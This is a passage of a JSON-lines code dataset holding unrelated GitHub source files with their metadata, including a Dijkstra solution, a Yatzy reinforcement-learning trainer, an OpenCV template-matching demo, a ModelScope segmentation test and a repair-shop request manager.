total\r\n","repo_name":"kurtrm/code-katas","sub_path":"src/jewels_and_stones.py","file_name":"jewels_and_stones.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"39781062316","text":"import sys\nimport heapq\ninf = float('inf')\ninput = sys.stdin.readline\n\nV, E = map(int, input().split())\ngraph = [[] for _ in range(V+1)]\nfor _ in range(E):\n u, v, w = map(int, input().split())\n graph[u].append((v, w)) # u->v\n graph[v].append((u, w)) # v->u\nv1, v2 = map(int, input().split())\ndistance = [[inf] * (V+1) for _ in range(3)] # 1, v1, v2\ndistance[0][1] = 0 # distance[0] : 1을 시작점으로 하는 최소거리\ndistance[1][v1] = 0 # distance[1] : v1을 시작점으로 하는 최소거리\ndistance[2][v2] = 0 # distance[2] : v2를 시작점으로 하는 최소거리\n\nfor i, S in enumerate([1, v1, v2]): # [(0,1), (1,v1), (2,v2)]\n heap = []\n heapq.heappush(heap,(0, S))\n while len(heap) > 0:\n weight, node = heapq.heappop(heap)\n if distance[i][node] >= weight:\n for v, w in graph[node]:\n if weight + w < distance[i][v]:\n distance[i][v] = weight + w\n heapq.heappush(heap, (weight+w, v))\n\nminimum = min(distance[0][v1] + distance[1][v2] + distance[2][V], distance[0][v2] + distance[2][v1] + distance[1][V])\n# distance[0][v1] 1->v1\n# distance[1][v2] v1->v2\n# distance[2][V] v2->V\n# distance[0][v2] 1->v2\n# distance[2][v1] v2->v1\n# distance[1][V] v1->V\nif minimum == inf:\n print(-1)\nelse:\n print(minimum)","repo_name":"cmh1027/bakjoon","sub_path":"최단경로/다익스트라/1504.py","file_name":"1504.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"25195688731","text":"from random import shuffle, choice\n\nlibrary = [\"champion\",\"international\", \"intelligence\", \"skyscrapper\"]\n\nword = choice(library)\nchars = list(word)\nlength = len(chars)\n\nshuffle(chars)\nfor i in range(length):\n print(chars[i], end=' ')\nprint()\nanswer = input(\"Your answer: \")\nif answer == word:\n print(\"Hura\")\nelse:\n print(\":(\")\n","repo_name":"tranduccuong90/C4E21","sub_path":"session3/ss3_excercise/ss3_hw3i.py","file_name":"ss3_hw3i.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"4785727895","text":"# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n#\n# ____ _\n# | __ ) _ _ __________ _ _ __ __| |\n# | _ \\| | | |_ /_ / _` | '__/ _` |\n# | |_) | |_| |/ / / / (_| | | | (_| |\n# |____/ \\__,_/___/___\\__,_|_| \\__,_|\n#\n#\n# Unit of Strength of Materials and Structural Analysis\n# University of Innsbruck,\n# 2021 - today\n#\n# Alexander Dummer alexander.dummer@uibk.ac.at\n#\n# This file is part of Buzzard.\n#\n# This library is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 2.1 of the License, or (at your option) any later version.\n#\n# The full text of the license can be found in the file LICENSE.md at\n# the top level directory of Buzzard.\n# ---------------------------------------------------------------------\n\nimport argparse\nimport os\n\nimport buzzard.core.optimizer\nimport buzzard.utils.journal\nfrom buzzard.core.optimizer import runOptimization\nfrom buzzard.utils.journal import printHeader\nfrom buzzard.utils.reader import readConfig, readConfigFromJson\n\nif __name__ == 
\"__main__\":\n\n parser = argparse.ArgumentParser(\n prog=\"buzzard\",\n description=\"A tool for optimizing (material) parameters for finite element simulations\",\n )\n\n parser.add_argument(\n \"file\",\n type=str,\n nargs=1,\n )\n parser.add_argument(\"--parallel\", action=\"store_true\", default=False)\n parser.add_argument(\"--createPlots\", action=\"store_true\", default=False)\n parser.add_argument(\"--quiet\", action=\"store_true\", default=False)\n\n args = parser.parse_args()\n\n buzzard.core.optimizer.executeSimulationsInParallel = args.parallel\n buzzard.core.optimizer.createPlots = args.createPlots\n buzzard.utils.journal.quiet = args.quiet\n\n printHeader()\n\n configFile = args.file[0]\n root, ext = os.path.splitext(configFile)\n if ext == \".py\":\n config = readConfig(configFile)\n elif ext == \".json\":\n config = readConfigFromJson(configFile)\n else:\n raise Exception(\"File type of config file must be .py or .json\")\n\n result = runOptimization(config)\n","repo_name":"EdelweissFE/Buzzard","sub_path":"buzzard.py","file_name":"buzzard.py","file_ext":"py","file_size_in_byte":2237,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"23721332100","text":"import datetime\nimport random\nimport time\nfrom numpy import average\n\n\nfrom game_ai import AIGame, AITest\nfrom hand import YatzyHand\nfrom leaderboard import Leaderboard\nfrom ai_gen_7 import AIGenSevenPointOne, AIGenSevenPointTwo, AIGenSevenPointTwoPointOne, AIGenSevenPointZero\n\n\n\nPLAYER = AIGenSevenPointTwoPointOne('karen')\n\n\nclass RLGame2(AIGame):\n def __init__(self, gen):\n super().__init__(gen=gen)\n\n\n def play(self, num):\n input('Welcome to Yatzy! Are you ready? ')\n start = datetime.datetime.now()\n\n self.make_name_lists()\n\n player = PLAYER \n player.read_q()\n\n for i in range(num):\n\n player.clear_scoresheet()\n first_name = random.choice(self.first_names)\n last_name = random.choice(self.last_names)\n name = first_name + ' ' + last_name\n player.name = name\n\n turns = 0\n while turns < 15:\n self.ai_turn(player)\n turns += 1\n \n new_player = player.copy()\n self.players.append(new_player)\n if i % 1000 == 0:\n print('Game {} complete'.format(i))\n \n\n final_scores = self.calculate_final_scores()\n end = datetime.datetime.now()\n print('Time elapsed: {}'.format(end - start))\n print(\"Game over! Now for the leaderboard...\")\n\n leaderboard = Leaderboard(self.gen)\n leaderboard.run(final_scores)\n print('')\n print('')\n\n\n def ai_turn(self, player):\n hand = YatzyHand()\n\n rerolls = 0\n while rerolls < 2:\n reroll = player.choose_action(hand, epsilon=False, q_table='reroll')\n\n if reroll == 'True':\n indices = player.choose_action(hand, epsilon=False, q_table='indices')\n hand = hand.reroll(indices)\n rerolls += 1\n \n else:\n break\n\n action = player.choose_action(hand, epsilon=False, q_table='moves')\n\n score = getattr(hand, action)()\n\n player.update_scoresheet(action, score)\n\n\n def print_final_scores(self, final_scores):\n \n final = sorted(final_scores, key= lambda x:x['score'])\n \n for i, item in enumerate(final):\n if i == len(final) - 1:\n print('And the winner is... ')\n print('')\n print('{} with {} points! Congrats!'.format(item['name'], item['score']))\n print('')\n\n else:\n print('{}: {} points'.format(item['name'], item['score']))\n print('')\n\nclass RLTrainer2(AIGame):\n \n def train(self, num):\n player = PLAYER\n self.players.append(player)\n player.read_q()\n player.load_new_hands()\n\n input(\"Ok {}! 
Let's begin! \".format(player.name))\n\n start = time.perf_counter()\n\n for i in range(num):\n player.clear_scoresheet()\n \n while None in player.scoresheet.values():\n self.ai_train_turn(player)\n \n if i % 1000 == 0:\n print('Finished game {}'.format(i))\n player.write_q()\n \n\n player.write_q()\n end = time.perf_counter()\n print('took {} seconds for {} runs'.format(end - start, num))\n \n\n def ai_train_turn(self, player):\n rerolls = 0\n\n hand = YatzyHand()\n old_hand = hand.copy()\n new_hand = []\n\n\n \n while rerolls < 2:\n action = player.choose_action(hand, epsilon=True, q_table='reroll')\n if action == 'True':\n player.update_reroll(hand, action)\n\n indices = player.choose_action(hand, epsilon=True, q_table='indices')\n hand = hand.reroll(indices)\n new_hand = hand.copy()\n rerolls += 1\n \n player.update_indices(old_hand, indices, new_hand)\n\n else:\n player.update_reroll(hand, action)\n break\n\n \n\n action = player.choose_action(hand, epsilon=True, q_table='moves')\n score = getattr(hand, action)()\n\n player.update_moves(hand, action, score)\n player.update_scoresheet(action, score)\n\n\nclass RLTest2(AITest):\n\n def play(self):\n player = PLAYER\n self.players.append(player)\n player.read_q()\n\n input(\"Ok {}! Let's begin! \".format(player.name))\n\n turns = 0\n while turns < 15:\n self.ai_turn(player)\n turns += 1\n\n\n final_scores = self.calculate_final_scores()\n print(\"Game over! Now for the score...\")\n print('')\n self.print_final_scores(final_scores)\n print('')\n\n print(\"{}'s Scoresheet:\".format(player.name))\n player.print_scoresheet()\n\n\n print('')\n\n print('Thanks for playing!')\n print('')\n\n\n def ai_turn(self, player):\n hand = YatzyHand()\n action = None\n\n rerolls = 0\n while rerolls < 2:\n reroll = player.choose_action(hand, epsilon=False, q_table='reroll')\n\n if reroll == 'True':\n print('')\n input('Hand: {}'.format(hand))\n print('')\n\n \n indices = player.choose_action(hand, epsilon=False, q_table='indices')\n print('Rerolling {}...'.format(indices))\n hand = hand.reroll(indices)\n rerolls += 1\n \n else:\n break\n\n action = player.choose_action(hand, epsilon=False, q_table='moves')\n\n print('')\n print('Hand: {}'.format(hand))\n input('Action decided: {}'.format(action))\n print('')\n\n score = getattr(hand, action)()\n\n player.update_scoresheet(action, score)\n player.print_scoresheet()\n\n\nclass RLGameData(RLGame2):\n def __init__(self, gen=None):\n super().__init__(gen=gen)\n self.yatzy_hands = 0\n self.total_rerolls = 0\n\n\n def play(self, num):\n input('Welcome to Yatzy! Are you ready? ')\n start = datetime.datetime.now()\n\n self.make_name_lists()\n\n player = PLAYER \n player.read_q()\n\n for i in range(num):\n\n player.clear_scoresheet()\n first_name = random.choice(self.first_names)\n last_name = random.choice(self.last_names)\n name = first_name + ' ' + last_name\n player.name = name\n\n turns = 0\n while turns < 15:\n self.ai_turn(player)\n turns += 1\n \n new_player = player.copy()\n self.players.append(new_player)\n if i % 1000 == 0:\n print('Game {} complete'.format(i))\n \n\n end = datetime.datetime.now()\n print('Time elapsed: {}'.format(end - start))\n print(\"Game over! 
Now for the leaderboard...\")\n\n\n data = [\n {'ones': 0, 'total': 0},\n {'twos': 0, 'total': 0},\n {'threes': 0, 'total': 0},\n {'fours': 0, 'total': 0},\n {'fives': 0, 'total': 0},\n {'sixes': 0, 'total': 0},\n {'one_pair': 0, 'total': 0},\n {'two_pair': 0, 'total': 0},\n {'three_kind': 0, 'total': 0},\n {'four_kind': 0, 'total': 0},\n {'small_straight': 0, 'total': 0},\n {'large_straight': 0, 'total': 0},\n {'full_house': 0, 'total': 0},\n {'chance': 0, 'total': 0},\n {'yatzy': 0, 'total': 0}\n ]\n top_sheet_bonuses = [0, 0]\n\n \n for player in self.players:\n sum = player.scoresheet['ones'] + player.scoresheet['twos'] + player.scoresheet['threes'] + player.scoresheet['fours'] + player.scoresheet['fives'] + player.scoresheet['sixes']\n for i, item in enumerate(player.scoresheet.items()):\n if item[1] != 0:\n data[i][item[0]] += 1\n data[i]['total'] += item[1]\n if sum >= 63:\n top_sheet_bonuses[0] += 1\n top_sheet_bonuses[1] += sum\n \n print('')\n print('')\n print('Gen {}'.format(self.gen))\n print('')\n '''\n for item in data:\n play = list(item.keys())[0]\n print(f\"Total {play}: {item[play]} out of {num} ---- Average: {item['total'] / item[play]}\")\n '''\n \n\n print('')\n print('Total rerolls: {}'.format(self.total_rerolls))\n #print('Total yatzy hands: {}'.format(self.yatzy_hands))\n\n print('')\n '''\n print('Total top-sheet bonuses: {} out of {}'.format(top_sheet_bonuses[0], num))\n print('Average top-sheet score: {}'.format(average(top_sheet_bonuses[1] / num)))\n '''\n print('')\n print('')\n\n\n def ai_turn(self, player):\n hand = YatzyHand()\n if hand.yatzy() == 50:\n self.yatzy_hands += 1 \n\n rerolls = 0\n while rerolls < 2:\n reroll = player.choose_action(hand, epsilon=False, q_table='reroll')\n\n\n if reroll == 'True':\n indices = player.choose_action(hand, epsilon=False, q_table='indices')\n hand = hand.reroll(indices)\n if hand.yatzy() == 50:\n self.yatzy_hands += 1 \n rerolls += 1\n self.total_rerolls += 1\n \n else:\n break\n\n action = player.choose_action(hand, epsilon=False, q_table='moves')\n\n score = getattr(hand, action)()\n\n player.update_scoresheet(action, score)\n\nif __name__ == \"__main__\":\n\n game = RLGameData(gen='7.2.1')\n game.play(1000)\n\n","repo_name":"jimmybanta/yatzy","sub_path":"rlgame2.py","file_name":"rlgame2.py","file_ext":"py","file_size_in_byte":9757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"15785291412","text":"# -*- coding: utf-8 -*-\nfrom setuptools import find_packages, setup\n\nclassifiers = [\n \"Development Status :: 5 - Production/Stable\",\n \"Intended Audience :: Education\",\n \"Operating System :: Microsoft :: Windows :: Windows 10\",\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: Python ::3\"\n]\n\nsetup(\n name=\"stoneforge\",\n version=\"0.1.4\",\n author=\"GIECAR - UFF\",\n url=\"https://github.com/giecaruff/stoneforge\",\n description=\"Geophysics equations, algorithms and methods\",\n long_description=open(\"README.md\").read() + \"\\n\\n\" + open(\"CHANGELOG.txt\").read(),\n license=\"MIT\",\n packages=find_packages(),\n include_package_data=True,\n python_requires=\">=3.8.8\",\n install_requires=[\n \"numpy>=1.21, <1.22.1\",\n \"pytest>=6.2.2, <6.2.5\",\n \"scipy>=1.4.1, <1.8.1\",\n \"scikit-learn>=0.22.1, <0.24.2\",\n #\"xgboost==1.4.0\",\n \"matplotlib>=3.5.0, <3.5.3\",\n \"pandas==1.5.2\",\n \"catboost==1.0.6\",\n \"lightgbm==3.3.2\",\n #\"catboost==0.26.1\"\n #\"auto-sklearn==0.12.5\"\n \n #\"matplotlib\", ### TO 
REMOVE BEFORE MERGE!!\n #\"pandas\", ### TO REMOVE BEFORE MERGE!!\n #\"jupyter\", ### TO REMOVE BEFORE MERGE!!\n #\"seaborn\" ### # TO REMOVE BEFORE MERGE!!\n ],\n)","repo_name":"giecaruff/stoneforge","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"} +{"seq_id":"33164875598","text":"# coding: utf-8\nfrom Bio import SeqIO\nimport cv2\nimport os\nimport scipy.misc\nimport numpy as np\nfrom PIL import Image\n\ndef seq2bin(seq_str):\n dict = {'P': '00001',\n 'Q': '00100',\n 'R': '00110',\n 'Y': '01100',\n 'W': '01110',\n 'T': '10000',\n 'M': '10011',\n 'N': '10101',\n 'V': '11010',\n 'E': '11101',\n 'L': '00011',\n 'H': '00101',\n 'S': '01001',\n 'F': '01011',\n 'C': '01111',\n 'I': '10010',\n 'K': '10100',\n 'A': '11001',\n 'D': '11100',\n 'G': '11110',\n 'end': '11111'}\n seq =list(seq_str)\n bin_=''\n for j in range(len(seq)):\n stra=str(dict[seq[j]])\n bin_ = bin_ + stra\n bin_info = bin_\n return bin_info\n\ndef Cellular_Automata(str_bit,Rule_number):\n rule_nb = ['111','110','101','100','011','010','001','000']\n rule_number = Rule_number \n rule_number_bit = str('{:08b}'.format(rule_number))\n rule_cond =list(rule_number_bit)\n xs=str_bit\n ab=xs[len(xs)-1]+xs+xs[0]\n new_ab=''\n for k in range(len(ab)-2):\n nb = ab[k:k+3]\n index_= rule_nb.index(nb)\n rule_bit = rule_cond[index_]\n new_ab = new_ab + rule_bit\n return new_ab\n\ndef Bin2Cellauto(Bin_info,Epochs,Rule_number):\n rule_number = Rule_number\n bin_info = Bin_info\n epoch=Epochs\n t = 0\n XS=np.zeros(shape=(epoch+1,len(bin_info)), dtype=np.int16)\n cellauto_bin=bin_info\n XS[0]=list(bin_info)\n kkk = 0\n for j in range(epoch):\n cellauto_bin = Cellular_Automata(cellauto_bin,rule_number)\n result = list(cellauto_bin) \n results = np.array(result, dtype=np.int16)\n XS[j+1]=results\n if j%1000 == 0:\n kkk += 1\n print(kkk)\n return XS\n\ndef CA_Img(seq_file,rule_numbers,epoch):\n for seq_record in SeqIO.parse(\"./data/\"+str(seq_file)+\".fasta\", \"fasta\"):\n seq_id = (str(seq_record.id))\n description = seq_record.description\n a = description.split(\"|\")\n seq = str(seq_record.seq)\n print(len(seq))\n bin_info = seq2bin(seq)\n print(len(bin_info))\n CA = Bin2Cellauto(bin_info,epoch,rule_numbers)\n print('yes!')\n BBB = CA*255\n img_dir = './data/'+str(seq_file)+'/'\n img_dir_Exists = os.path.exists(img_dir)\n if not img_dir_Exists:\n os.makedirs(img_dir)\n img_name = str(seq_file) +'_'+ str(seq_id)+'_rule'+str(rule_numbers)+'_'+str(epoch)\n scipy.misc.toimage(BBB).save(str(img_dir)+str(img_name)+'.jpeg')\nrule_numbers =184\nepochs = [25]\nfile_list = ['Wuhan']\n\nfor epoch in epochs:\n for i in file_list:\n print(i)\n CA_Img(i,rule_numbers,epoch)\n\n","repo_name":"liujin66/iAMP-CA2L","sub_path":"iAMP-CA2L/cellular automata pictures.py","file_name":"cellular automata pictures.py","file_ext":"py","file_size_in_byte":2805,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"16"} +{"seq_id":"26372351126","text":"import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n\"\"\"\n1. 模板匹配介绍:模板匹配是一种最原始、最基本的模式识别方法,研究某一特定目标的图像位于图像的什么地方,进而对图像进行定位。\n在待检测图像上,从左到右,从上向下计算模板图像与重叠子图像的匹配度,匹配程度越大,两者相同的可能性越大。\n2. 
模板匹配函数:\nresult = cv2.matchTemplate(image, templ, method)\n - image参数表示待搜索图像\n - templ参数表示模板图像,必须不大于源图像并具有相同的数据类型\n - method参数表示计算匹配程度的方法\n - TM_SQDIFF_NORMED是标准平方差匹配,通过计算两图之间平方差来进行匹配,最好匹配为0,匹配越差,匹配值越大\n - TM_CCORR_NORMED是标准相关性匹配,采用模板和图像间的乘法操作,数越大表示匹配程度较高,0表示最坏的匹配效果,\n 这种方法排除了亮度线性变化对相似度计算的影响。\n - TM_CCOEFF_NORMED是标准相关性系数匹配,两图减去了各自的平均值之外,还要各自除以各自的方差。\n 将模板对其均值的相对值与图像对其均值的相关值进行匹配,1表示完美匹配,-1表示糟糕的匹配,0表示没有任何相关性(随机序列)。\nminVal, maxVal, minLoc, maxLoc = cv2.minMaxLoc()\n - minVal参数表示返回的最小值\n - maxVal参数表示返回的最大值\n - minLoc参数表示返回的最小位置\n - maxLoc参数表示返回的最大位置\n\"\"\"\n\ndef template_demo(tpl, target):\n \"\"\"\n 模板匹配\n :param tpl: 模板\n :param target: 源图像\n :return:\n \"\"\"\n # 定义匹配的方法,三种模板匹配的方法\n methods = [cv2.TM_SQDIFF_NORMED, cv2.TM_CCORR_NORMED, cv2.TM_CCOEFF_NORMED]\n # 获取模板维度信息\n th, tw = tpl.shape[:2]\n # 遍历三种模板匹配的方法\n for md in methods:\n # 模板匹配,获得所有子图像的相似度系数\n result = cv2.matchTemplate(target, tpl, md)\n print(result)\n # 获取相似度系数最大值和最小值,以及相应子图像的位置\n min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(result)\n print(min_val, max_val, min_loc, max_loc)\n if md == cv2.TM_SQDIFF_NORMED:\n t1 = min_loc\n else:\n t1 = max_loc\n # 计算得到矩形右下角的坐标\n br = (t1[0] + tw, t1[1] + th)\n # 画出目标框\n cv2.rectangle(target, t1, br, (0, 0, 255), 2)\n cv2.namedWindow(\"match-\" + str(md), cv2.WINDOW_NORMAL)\n cv2.imshow(\"match-\" + str(md), target)\n\n\n\ndef main():\n # 加载模板图像\n tpl = cv2.imread(r\"./images/sample2.jpg\")\n # 加载源图像\n target = cv2.imread(r\"./images/target1.jpg\")\n # 显示模板图和源图像\n cv2.namedWindow(\"template image\", cv2.WINDOW_NORMAL)\n cv2.imshow(\"template image\", tpl)\n cv2.namedWindow(\"target image\", cv2.WINDOW_NORMAL)\n cv2.imshow(\"target image\", target)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n template_demo(tpl, target)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n\n\nif __name__ == '__main__':\n main()\n\n\n\n","repo_name":"yykzjh/opencv_practice","sub_path":"第4课 图像特征与目标检测(形状特征(Harris特征、HOG特征、SIFT特征)、LBP纹理特征、模板匹配、人脸检测、行人检测)/模板匹配.py","file_name":"模板匹配.py","file_ext":"py","file_size_in_byte":3272,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"22865225968","text":"import unittest\n\nimport cv2\nimport PIL\n\nfrom modelscope.outputs import OutputKeys\nfrom modelscope.pipelines import pipeline\nfrom modelscope.utils.constant import Tasks\nfrom modelscope.utils.cv.image_utils import panoptic_seg_masks_to_image\nfrom modelscope.utils.test_utils import test_level\n\n\nclass ImagePanopticSegmentationTest(unittest.TestCase):\n\n def setUp(self) -> None:\n self.task = Tasks.image_segmentation\n self.model_id = 'damo/cv_swinL_panoptic-segmentation_cocopan'\n\n @unittest.skipUnless(test_level() >= 0, 'skip test in current test level')\n def test_image_panoptic_segmentation(self):\n input_location = 'data/test/images/image_panoptic_segmentation.jpg'\n pan_segmentor = pipeline(Tasks.image_segmentation, model=self.model_id)\n result = pan_segmentor(input_location)\n\n draw_img = panoptic_seg_masks_to_image(result[OutputKeys.MASKS])\n cv2.imwrite('result.jpg', draw_img)\n print('print test_image_panoptic_segmentation return success')\n\n @unittest.skipUnless(test_level() >= 0, 'skip test in current test level')\n def test_image_panoptic_segmentation_from_PIL(self):\n input_location = 'data/test/images/image_panoptic_segmentation.jpg'\n pan_segmentor = pipeline(Tasks.image_segmentation, model=self.model_id)\n PIL_array = PIL.Image.open(input_location)\n result = pan_segmentor(PIL_array)\n\n draw_img = 
panoptic_seg_masks_to_image(result[OutputKeys.MASKS])\n cv2.imwrite('result.jpg', draw_img)\n print('print test_image_panoptic_segmentation from PIL return success')\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"modelscope/modelscope","sub_path":"tests/pipelines/test_image_panoptic_segmentation.py","file_name":"test_image_panoptic_segmentation.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","stars":4825,"dataset":"github-code","pt":"16"} +{"seq_id":"25419163167","text":"from datetime import *\n\nfrom tools import *\n\n\ndef search_u(text):\n p = People()\n f = open('SEARCH_U.txt', 'w')\n for person in p.people:\n if text in person.NAME or text in person.PHONE:\n f.write(person.__str__() + '\\n')\n\n\ndef search_e(text):\n e = Equip()\n f = open('SEARCH_E.txt', 'w')\n for gadget in e.gadgets:\n if text in gadget.MODEL:\n f.write(gadget.__str__() + '\\n')\n\n\ndef search_w(text):\n w = Works()\n f = open('SEARCH_W.txt', 'w')\n for work in w.works:\n if text in work.WORK and not work.WORK.isdigit() or text in str(work.PRICE):\n f.write(work.__str__() + '\\n')\n\n\ndef new_card(db, line, edit=False):\n if db == 'USER':\n p = People()\n new_person = Person(*line.split(', '))\n if (new_person.PHONE in p.get_phones() or new_person.ID in p.get_ids()) and not edit:\n raise CardInBaseException('user.txt')\n p.add_person(line)\n p.make_file()\n elif db == 'EQUIP':\n e = Equip()\n new_gadget = Gadget(*line.split(', '))\n if new_gadget.BRAND in e.get_brands() and new_gadget.MODEL == \\\n e.get_models()[\n e.get_brands().index(new_gadget.BRAND)] or new_gadget.ID in e.get_ids():\n raise CardInBaseException('equip.txt')\n e.add_equip(line)\n e.make_file()\n elif db == 'WORK':\n w = Works()\n new_work = Work(*line.split(', '))\n if new_work.WORK in w.get_works() or new_work.ID in w.get_ids():\n raise CardInBaseException('user.txt')\n w.add_work(line)\n w.make_file()\n\n\ndef edit_card(db, ID, line):\n if db == 'USER':\n f = open('people.txt')\n data = f.readlines()\n data.pop(People().get_ids().index(ID))\n f.close()\n f = open('people.txt', 'w')\n f.writelines(data)\n f.close()\n elif db == 'EQUIP':\n Equip().gadgets.pop(Equip().get_ids().index(ID))\n f = open('equip.txt')\n data = f.readlines()\n data.pop(Equip().get_ids().index(ID))\n f.close()\n f = open('equip.txt', 'w')\n f.writelines(data)\n f.close()\n elif db == 'WORK':\n Works().works.pop(Works().get_ids().index(ID))\n f = open('works.txt')\n data = f.readlines()\n data.pop(Works().get_ids().index(ID))\n f.close()\n f = open('works.txt', 'w')\n f.writelines(data)\n f.close()\n new_card(db, line, True)\n\n\ndef print_card(db, ID):\n if db == 'USER':\n print(People().people[People().get_ids().index(ID)])\n elif db == 'EQUIP':\n print(Equip().gadgets[Equip().get_ids().index(ID)])\n elif db == 'WORK':\n print(Works().works[Works().get_ids().index(ID)])\n\n\ndef list_db(db):\n if db == 'USER':\n print(People())\n elif db == 'EQUIP':\n print(Equip())\n elif db == 'WORK':\n print(Works())\n\n\ndef create_report():\n f = open('reports.txt', 'w')\n lines = []\n now = datetime.now()\n for request in Requests().requests:\n if datetime(*list(map(int, request.COMPLETE_DATE.split('-')))) <= now < datetime(\n *list(map(int, request.DELIVERY_DATE.split('-')))):\n email = People().get_emails()[People().get_ids().index(request.CLIENT_ID)]\n brand = Equip().get_brands()[Equip().get_ids().index(request.EQUIP_ID)]\n model = Equip().get_models()[Equip().get_ids().index(request.EQUIP_ID)]\n 
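# report line format: client email, equipment brand, model, completion date\n            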
lines.append(f'{email}, {brand}, {model}, {request.COMPLETE_DATE};\\n')\n f.write('\\n'.join([line for line in lines]))\n f.close()\n\n\ndef create_inwork(master_name):\n f = open('inwork.txt', 'w')\n now = datetime.now()\n for request in Requests().requests:\n if People().get_names()[People().get_ids().index(request.MASTER_ID)] == master_name and \\\n datetime(*list(map(int, request.COMPLETE_DATE.split('-')))) < now:\n brand = Equip().get_brands()[Equip().get_ids().index(request.EQUIP_ID)]\n model = Equip().get_models()[Equip().get_ids().index(request.EQUIP_ID)]\n f.write(f'{request.DATE}, {request.ID}, {brand}, {model}, {request.REASON};\\n')\n f.close()\n\n\ndef print_help(command=''):\n f = open('help.txt', encoding='utf-8')\n data = f.readlines()\n if not command:\n for line in data:\n print(line.strip('\\n'))\n elif command.startswith('HELP'):\n print(''.join(data[:2]))\n elif command.startswith('NEW'):\n print(data[2])\n print(''.join(data[9:12]))\n else:\n for line in data:\n if line.startswith(command):\n print(line.split('\\n'))\n break\n\n\ndef del_request(ID):\n i = Requests().get_ids().index(ID)\n f = open('requests.txt')\n data = f.readlines()\n f.close()\n data = data[:i] + data[i+1:]\n f = open('requests.txt', 'w')\n f.writelines(data)\n f.close()\n\n\ndef request_in_requests(ID):\n for line in open('requests.txt').readlines():\n if line.split()[1] == str(ID):\n return True\n return False\n\n\ndef new_request():\n args = {\n 'ID': '',\n 'DATE': '',\n 'CLIENT_ID': '',\n 'EQUIP_ID': '',\n 'REASON': '',\n 'MASTER_ID': '',\n 'WORK_IDS': '',\n 'COMPLETE_DATE': '',\n 'DELIVERY_DATE': '',\n 'COST': ''\n }\n print('Выбирайте поля командой PUSH и вводите значения')\n print('+------------+')\n print('|Начало формы|')\n print('+------------+')\n for key, value in args.items():\n print(f'{key}: {str(value)}')\n print('+-----------+')\n print('|Конец формы|')\n print('+-----------+')\n while not all_filled(args):\n c = input()\n command = c.split()\n if len(command) == 2 and command[0] == 'PUSH' and command[1] in args.keys():\n value = input()\n if command[1] == 'ID':\n if value.isdigit() and int(value) not in Requests().get_ids():\n args['ID'] = int(value)\n else:\n raise BadValueException(value)\n elif command[1] in ['DATE', 'COMPLETE_DATE', 'DELIVERY_DATE']:\n x = value.split('-')\n if len(x) == 3 and (x[0] + x[1] + x[2]).isdigit() and len(x[0]) == 4 and \\\n len(x[1]) == 2 and len(x[2]) == 2 and 1 <= int(x[1]) <= 12 and 1 <= \\\n int(x[2]) <= 31:\n args[command[1]] = value\n elif command[1] == 'CLIENT_ID':\n if value.isdigit() and int(value) in People().get_ids():\n args['CLIENT_ID'] = int(value)\n else:\n raise BadValueException(value)\n elif command[1] == 'EQUIP_ID':\n if value.isdigit() and int(value) in Equip().get_ids():\n args['EQUIP_ID'] = int(value)\n else:\n raise BadValueException(value)\n elif command[1] == 'REASON':\n args['REASON'] = value\n elif command[1] == 'MASTER_ID':\n if value.isdigit() and int(value) in \\\n People().get_ids() and 1 <= int(value) <= 20:\n args['MASTER_ID'] = int(value)\n else:\n raise BadValueException(value)\n elif command[1] == 'WORK_IDS':\n value = value.split()\n check = True\n for v in value:\n if not v.isdigit() and int(v) in Works().get_ids():\n check = False\n if check:\n args['WORK_IDS'] = value\n else:\n raise BadValueException(' '.join(value))\n else:\n raise UnknownFieldNameException(command[1])\n if args['WORK_IDS']:\n s = 0\n for work_id in args['WORK_IDS']:\n s += Works().get_prices()[Works().get_ids().index(int(work_id))]\n 
args['COST'] = s\n print('+------------+')\n print('|Начало формы|')\n print('+------------+')\n for key, value in args.items():\n print(f'{key}: {str(value)}')\n print('+-----------+')\n print('|Конец формы|')\n print('+-----------+')\n if all_filled(args):\n Requests().add_request(f\"{', '.join([value for value in args.values()])};\")\n break\n else:\n raise UnknownCommandException(c)\n\n\ndef all_filled(args):\n check = True\n for value in args.values():\n if value == '':\n check = False\n return check\n\n\ndef main():\n command = input().split()\n if command[0] == 'HELP':\n if len(command) == 1:\n print_help()\n elif len(command) == 2:\n print_help(command[1])\n elif command[0] == 'NEW':\n if command[1] == 'REQUEST':\n new_request()\n else:\n new_card(command[1], ' '.join(command[2:]))\n\n elif command[0] == 'LIST' and len(command) == 2:\n list_db(command[1])\n elif command[0] == 'EDIT':\n edit_card(command[2], int(command[1]), command[1] + ', ' + ' '.join(command[3:]))\n elif command[0] == 'PRINT' and len(command) == 3:\n print_card(command[2], int(command[1]))\n elif command[0] == 'FIND_U' and len(command) == 2:\n search_u(command[1])\n elif command[0] == 'FIND_E' and len(command) == 2:\n search_u(command[1])\n elif command[0] == 'FIND_W' and len(command) == 2:\n search_u(command[1])\n elif command[0] == 'DEL' and len(command) == 2:\n del_request(int(command[1]))\n Requests().make_file()\n elif command[0] == 'EXIT' and len(command) == 1:\n raise ExitException\n else:\n raise UnknownCommandException(f\"'{' '.join(command)}'\")\n\n\nif __name__ == '__main__':\n while True:\n # 